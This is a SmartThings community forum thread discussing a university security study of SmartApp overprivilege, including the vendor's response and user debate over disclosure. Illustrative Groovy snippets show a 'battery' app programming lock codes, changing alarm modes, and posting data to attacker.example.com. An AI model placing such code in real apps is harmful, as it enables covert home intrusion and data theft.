SmartThings Platform Security - Response from Alex

Protecting our customers’ privacy and data security is fundamental to everything we do at SmartThings. We regularly perform penetration tests of our system and engage with professional third-party security experts. We embrace their research so that we can continue to get in front of any potential vulnerabilities, and be industry leaders when it comes to the security of our platform.

A research report entitled “Security Analysis of Emerging Smart Home Applications” was released this morning by a team from the University of Michigan and Microsoft Research. The report discloses hypothetical vulnerabilities in the SmartThings platform and demonstrates how, under certain circumstances, they could be exploited.

It is important to note that none of the vulnerabilities described have affected any of our customers thanks to the SmartApp approval processes that we have in place. Over the past several weeks, we have been working with this research team and have already implemented a number of updates to further protect against the potential vulnerabilities disclosed in the report.

Specific enhancements we have already implemented include:

  • Modifying the SmartThings platform to ensure that only “Published” SmartApps can be installed into customer accounts through the OAuth method. Published SmartApps are those that have undergone a complete source code security review by SmartThings to ensure that the application does only what it advertises as its purpose – and contains no malicious code.

  • Updating our best practices for development of SmartApps that expose web services, and mobile applications that integrate with the SmartThings platform. We are working with our third-party developer partners to ensure that all partners follow these best practices to avoid any potential vulnerabilities.

  • In all cases, we have strengthened our source code review processes and believe in their efficacy, but we are also working to update the underlying platform to systematically prevent these potential vulnerabilities in the future.

As an open platform with a growing and active developer community, SmartThings provides detailed guidelines on how to keep all code secure and how to determine what is a trusted source. Code downloaded from an untrusted source can present a potential risk – just as a PC user who installs software from an unknown third-party website risks installing software that contains malicious code.

Even though current customers have not been impacted, we take the recommendations of Mr. Fernandes, Dr. Jung, and Dr. Prakash extremely seriously and are grateful for all opportunities to continue to improve the security of our platform.

Let us know any questions you’ve got here and we’ll be ready to dig further into the details.



I have posted a response from the perspective of SmartTiles as a comment on @Alex’s blog entry:


How does this impact Rule Machine for those of us that still have it? :sweat:

I don’t believe it has any impact on RM.

1 Like

This is only with respect to the OAuth changes linked above. If the app is not installed through the OAuth method it is not impacted at all.


Thanks @slagle . I guess I was ignorant to what OAuth is or was. All I knew was RM didn’t get reviewed by ST so had me worried. :slight_smile:


Unless I’m misunderstanding this, the published videos of the various attacks indicate that a common issue is the lack of fine-grained access controls based on the defined capabilities of an installed SmartApp. So they created an application that seemingly only requests capability.battery, but they were able to intercept/send raw Z-Wave commands to sniff/set user codes on an associated device? Why should such an application be permitted to do anything but read the battery level of the permitted device(s)? While I certainly understand that the implications of something like this are far more severe with OAuth-based apps, where a user is blindly trusting the developer, wouldn’t this carry over to users who just blindly copy/paste community code into their IDE?

Is the real issue that developers are improperly defining the requirements that their application needs to function and/or is it an access control bypass being exploited?

1 Like

You understand the problem correctly.

It’s not a bug, it is a missing feature; i.e., this has never been hidden, and it has always worked per specifications and/or documentation.

The preferences input function uses Capability solely as a Device selection filter, not as a way to define and restrict granular access to specific functions (Attributes, Commands, Events) of the Device. This may have been on the wishlist, but was never implemented. Thus, not a bug; I don’t even think it should be called an “exploit”, because it is not a hidden vulnerability (except, perhaps, for the lack of Customer education).
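A minimal Groovy sketch of the pattern described above (app name, handler, and device selection are illustrative, not taken from the paper): the SmartApp asks the user only for capability.battery devices, but once a multi-capability device such as a battery-powered lock is selected, nothing stops the app from calling that device’s other commands:

```groovy
// Hypothetical “Battery Monitor” SmartApp illustrating capability-as-filter.
// The input below only filters the device picker to devices reporting
// capability.battery; it does not restrict what the app may call later.
preferences {
    section("Monitor the battery of:") {
        input "monitored", "capability.battery", multiple: true
    }
}

def installed() {
    subscribe(monitored, "battery", batteryHandler)
}

def batteryHandler(evt) {
    log.debug "Battery at ${evt.value}%"
    // Overprivilege: if the user happened to select a battery-powered door
    // lock, the platform does not prevent the app from invoking commands
    // from the lock-codes capability as well:
    monitored.each { dev ->
        if (dev.hasCommand("setCode")) {
            dev.setCode(5, "1234")   // could silently program a new user code
        }
    }
}
```

The `input` line is what the user sees at install time; everything after it runs without any further prompt.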

Similarly, the Location Object is fully open to any installed SmartApp, because no preferences/input statement is required for the app to use it. I have raised this concern multiple times, including proposing a simple practical fix (make “Location” or its functions a type of Device / Capability). location.mode (and SHM mode) is sensitive functionality, since it is often used to arm/disarm alarms, right? So giving a Battery Monitor SmartApp the right to use it should require explicit user permission; otherwise only a code review can prove that a given SmartApp is not changing your Mode and disarming your home!
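As a sketch of the Location concern (again illustrative, not from the research paper): any installed SmartApp can read and set the location mode without declaring anything in preferences, so nothing on the install screen hints at it:

```groovy
// No preferences/input entry is needed to touch the Location object.
def installed() {
    log.debug "Current mode: ${location.mode}"
    // An app installed as, say, a battery monitor could still do this,
    // flipping the mode that routines use to arm/disarm the home:
    setLocationMode("Home")
}
```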

The issue with Device function granularity can be mitigated with the use of Virtual Device Types and instances… For example, you could create two separate devices of type Unlock and Lock with distinct properties. If the platform had a simple inheritance paradigm, this structure might even be practical.

Maybe this can be done with abstraction under the covers, but it gets super complicated because ad hoc Attributes, Commands, and Events (ie, those not in an official Capability) will also need to be presented in an understandable granular fashion to users. Gets confusing for the average consumer really quickly.
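One way to picture the Virtual Device mitigation described above (the device type name and companion-app arrangement are hypothetical): define a virtual device that exposes only the unlock side, and let a small companion SmartApp proxy its events to the real lock, so other apps can be granted the virtual device instead of the full lock:

```groovy
// Hypothetical “Unlock Only” virtual device type: exposes a single
// Momentary push() command and nothing from the Lock or Lock Codes
// capabilities (no lock(), no setCode(), no code retrieval).
metadata {
    definition(name: "Virtual Unlock Only", namespace: "example", author: "sketch") {
        capability "Momentary"
    }
}

def push() {
    // Raise an event; a trusted companion SmartApp subscribed to this
    // virtual device performs the actual realLock.unlock() on its behalf.
    sendEvent(name: "momentary", value: "pushed", isStateChange: true)
}
```

A SmartApp granted this virtual device can trigger an unlock but can never read or program user codes, since those commands simply do not exist on the proxy.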


Gotcha, thanks for the insight. I guess this is just another reminder that security is always an afterthought (not directed at ST specifically, just software in general). While it may not qualify as a “bug” simply because the separation never existed in the first place, I don’t think there is any doubt as to this being undesirable behavior for a product for which one of its use cases is marketed as home security. Next time $relative clicks on the wrong link, I don’t want to have to clean the malware off their machine AND make sure there are no extra codes hidden in the front door.

No doubt walking the line between usability and security is a slippery slope. Virtual devices as a mitigation technique is way too complicated for the average user…hell, I would prefer not to deal with them as a technical one :slight_smile:


Recent Android releases (Marshmallow?) have improved the granular access control request mechanism – or so I think. I believe apps can now defer asking for a permission until it is actually used (?).

Still – How much do you want to bet that over 80% of Android users completely ignore (and blindly “Accept All”) the list of permission requests presented to them when they install an App from the Play Store?

Why would a SmartThings Customer be any different? The research paper misses the point: Users do not understand granular access control. Malicious SmartApp installation is much more an education problem than anything else – unless SmartThings can come up with a way to arbitrarily decide what a SmartApp that is called “Battery Monitor” should and should not have access to. … i.e., that’s an easy strawman example. So what about a SmartApp called “SmartTiles” or “Smart Alarm” or “Smart Rules”? Must the user check dozens of boxes to grant the wide range of permissions these apps genuinely, reasonably and legitimately require?

1 Like

You are being kind with that 80% number. People are very trusting by nature and will install pretty much anything, expecting the app to play nice.

However, in this case there is not even a courtesy notification that access is wide open and the app can access anything and everything in the platform. What’s worse, the app is not even limited in scope to what is on the hub itself: it can issue a call into the cloud to send out information, or use a HubAction to gain access to other devices on your local network (the possibilities are endless to an inventive hacker). This is true for apps I install myself as well as apps/devices that have been “reviewed” by ST. And even though there is additional value in the ST review of an app, if you think about it, there really is no reason we should trust that an ST employee has not made a mistake in the review; they are only human.
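To make the scope concern above concrete (the endpoint, payload, and LAN address here are invented for illustration): a SmartApp is not sandboxed to the devices it was granted; it can make outbound HTTP calls and craft local-network requests via HubAction with no additional permission prompt:

```groovy
// Illustrative only: neither call requires any permission beyond installation.
def installed() {
    // Outbound cloud call: could carry any data the app has gathered.
    httpPost(uri: "https://attacker.example.com/collect",
             body: [mode: location.mode]) { resp ->
        log.debug "posted: ${resp.status}"
    }

    // LAN request via HubAction: reaches other devices on the local network,
    // well beyond anything selected in the app's preferences.
    sendHubCommand(new physicalgraph.device.HubAction(
        method: "GET",
        path: "/status",
        headers: [HOST: "192.168.1.50:80"]   // some unrelated LAN device
    ))
}
```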

1 Like

I totally agree that typical users have zero understanding of what they’re actually doing when they click yes/allow buttons, other than that’s usually what solves their problem, but at least they were given the opportunity to think twice before doing something stupid. I am immediately reminded of the way Firefox handles SSL certificate errors, requiring three clicks by the user to convince them it’s a bad idea to proceed before presenting the page behind it, which many thought was ridiculous at the time.

I hope you’re not saying that simply because the average user doesn’t know any better, it’s a valid excuse for applications to be allowed to misbehave for the purpose of simplicity. I do get where you’re coming from given the nature of SmartTiles, and it would be burdensome for a user to click an allow button 200 times to get their tiles working, but there’s obviously a middle ground.

At the end of the day, there is no excuse for an arbitrary application to have the capability to, in your example, disarm SHM. This has little to nothing to do with the items called out in the OP, and it seems the biggest security issue is the one barely even mentioned. I’m curious to see what safeguards are being considered to address these.

The problem here depends on the definition of “misbehave”.

If you give your neighbor a physical key to your front door, they will be able to lock and unlock it whenever and for whatever reason they wish.

I’m sure you gave them the key for “emergencies” only… But is running out of bus fare an “emergency” that justifies using the key to come in and “borrow” some cash from the swear jar?

People give and understand vague or ambiguous instructions. Computers don’t… Yet.

To reduce the risk exposure of the neighbor with the key, you could station a Security Guard in your home who has been given a very clear definition of what is a valid “emergency”, and prevents the neighbor from entering and/or from accessing your piggy bank.

Sure, SmartThings can provide the Security Guard, but the user must still give him/her very precise instructions. Since the guard here is a computer program, the instructions must be 100% precise. So anything not permitted is “misbehaving”.

SmartThings didn’t / doesn’t provide the security guard. If you give a SmartApp access to your front door lock, it can do anything with that lock, and who knows what that leads to, right? SmartThings may have considered it sufficient to conduct a long interview (code review) of the neighbor to make sure she/it is incapable of misbehaving… of abusing the trust you put in her/it.

Frankly, until the last decade or so, this was the de facto and ubiquitous paradigm; feature-by-feature or function-by-function access control granularity on a PC wasn’t considered necessary… but it came about with the rise of smartphones and Apps.

But SmartThings was designed 4 years ago: They should have known and done better.

Is there some reason that select Community members and prominent Developers were not informed of this research sooner? (i.e., besides the obvious risks of disclosure, but … ?).

Actually, why did the Community and all Customers have to wait to find this out in the media, instead of being notified through SmartThings’s own channels ahead of the press release?

A checkbox or option somewhere for critical devices (locks, mode changes, etc.) would be useful; then at least the user couldn’t feign ignorance.

1 Like

You ask the same question in another thread, so I’ll just point to my answer there, but this is standard industry practice.


Yup… That Topic has become derailed somewhat; lots of dog memes!

There doesn’t seem to be a single industry standard for vulnerability disclosure, though there are some common themes.

The condition that the “discoverer” should have the right of first publication seems to be in a grey area, ethically speaking, as far as I am concerned. While researchers and the media “earn” some benefits from a cooperative disclosure arrangement, I think vendors/companies also deserve the right to inform customers (and platform/community developers) prior to a possibly confusing media frenzy.

This isn’t the place to discuss disclosure policies in detail, but I found a random (and dated: 2005) student paper that compares various options, which interested folks might glance at; perhaps we should spin off a Topic for discussion?

Page 18:

If you’ve installed any SmartApps into your SmartThings ecosystem, you are at risk.

I’m surprised to see relatively little coverage of the University of Michigan study into the SmartThings ecosystem and the inherent security flaws in the ecosystem.

We are all trusting various aspects of our home security, privacy, and living conditions to our Internet of Things. Having garage doors, door locks, cameras, door sensors, and lights attached to the ecosystem puts everyone at risk until these issues are addressed, or mitigated.

Here is a good overview:

The full study from the University of Michigan may be found here:

The paper is here:

Additionally, Steve Gibson, a well-known security professional who hosts the “Security Now” podcast on the TWiT network, devoted the bulk of one of his episodes to it recently; the episode may be found here:

The transcript may be found here:

Finally, the last two pages of Steve’s show notes do a great job summarizing the issue:

Hope this helps. Steve also then followed up the episode with one on Zwave issues the next week:


It’s not getting the attention because the issue is highly overblown. Of course there exists the possibility of a security hole when the ecosystem allows you to paste raw source code and create your own app. You can just as easily copy and paste VBScript on a Windows PC and let a trojan in just the same.

The OAuth issue was legit, but it’s fixed. Case closed as far as I’m concerned.


The real issue is that unless ST bans anything but ZigBee 3.0, there will always be an issue, effectively rendering any device below ZigBee 3.0 worthless, as I doubt an update function was implemented for the majority of devices … so they will always require compatibility, OR people will need to upgrade their devices when ZigBee 3.0 devices become available … trade-off or sinkhole …